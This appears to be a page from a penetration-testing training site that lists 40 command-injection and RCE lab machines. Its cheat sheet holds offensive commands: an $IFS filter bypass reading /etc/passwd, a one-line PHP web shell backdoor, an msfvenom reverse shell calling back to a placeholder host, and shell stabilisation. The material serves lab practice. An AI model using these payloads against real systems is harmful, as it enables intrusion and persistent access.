Command Injection and RCE: practice machines and key commands
Command injection occurs when an application passes input to a system shell. Try separators such as ;, &&, |, backticks and $() after a legitimate value, and test blind cases with a sleep or an out-of-band request to your own listener. When spaces or specific characters are filtered, alternatives like ${IFS}, brace expansion and quoting tricks often bypass the check. Once you can run a command, prefer a short reverse shell or write a web shell, then stabilise the TTY before enumerating. Public remote code execution exploits for known CVEs follow the same pattern but usually need edits to the target address, payload or offsets, so read the code before running it. Identify the service version first, then match it to a trusted advisory. The machines here have a command execution foothold.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
Command Injection Space Filter Bypass ($IFS)
Bypass space character filtering in vulnerable web commands using bash internal field separator.
cat$IFS/etc/passwdMinimal PHP Single-Line Backdoor
Lightweight PHP command execution backdoor for quick web root persistence.
echo '<?php system($_GET["cmd"]); ?>' > shell.phpmsfvenom Linux x64 Staged Reverse TCP ELF
Compile standalone ELF reverse shell binary for x64 Linux target.
msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elfTTY Interactive Shell Stabilization (Python + stty)
Upgrade dumb reverse shell to fully interactive pseudo-terminal with tab completion and arrow keys.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background shell
stty raw -echo; fg
export TERM=xterm-256color
stty rows 38 columns 140
Keep going
- Methodology: Phase 05: Shell Stabilization & Context Triage
- Cheatsheet: Exploitation & Payloads
- Shells: Reverse shell one-liners
Command Injection and RCE machines (40)
5 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 33 Linux, 7 Windows.
Very Easy (1)
| Machine | Platform | OS |
|---|---|---|
| Pennyworth | HTB | Linux |
Easy (16)
| Machine | Platform | OS |
|---|---|---|
| Agent T | THM | Linux |
| Epoch | THM | Linux |
| Pickle Rick | THM | Linux |
| Vulnerability Capstone | THM | Linux |
| Arctic | HTB | Windows |
| Busqueda | HTB | Linux |
| Ignite | THM | Linux |
| Irked | HTB | Linux |
| Love | HTB | Windows |
| Networked | HTB | Linux |
| Photobomb | HTB | Linux |
| Precious | HTB | Linux |
| Res | THM | Linux |
| RouterSpace | HTB | Linux |
| ScriptKiddie | HTB | Linux |
| SwagShop | HTB | Linux |
Medium (12)
| Machine | Platform | OS |
|---|---|---|
| Bastard | HTB | Windows |
| Cronos | HTB | Linux |
| Devzat | HTB | Linux |
| dynstr | HTB | Linux |
| Health | HTB | Linux |
| Lookup | THM | Linux |
| Meta | HTB | Linux |
| Pit | HTB | Linux |
| Relevant | THM | Windows |
| Tenten | HTB | Linux |
| The Cod Caper | THM | Linux |
| TheNotebook | HTB | Linux |
Hard (7)
| Machine | Platform | OS |
|---|---|---|
| Dropzone | HTB | Windows |
| EarlyAccess | HTB | Linux |
| Monitors | HTB | Linux |
| Overflow | HTB | Linux |
| Tally | HTB | Windows |
| Year of the Dog | THM | Linux |
| Year of the Fox | THM | Linux |
Insane (4)
| Machine | Platform | OS |
|---|---|---|
| Bankrobber | HTB | Windows |
| Brainfuck | HTB | Linux |
| Nightmare | HTB | Linux |
| Stacked | HTB | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox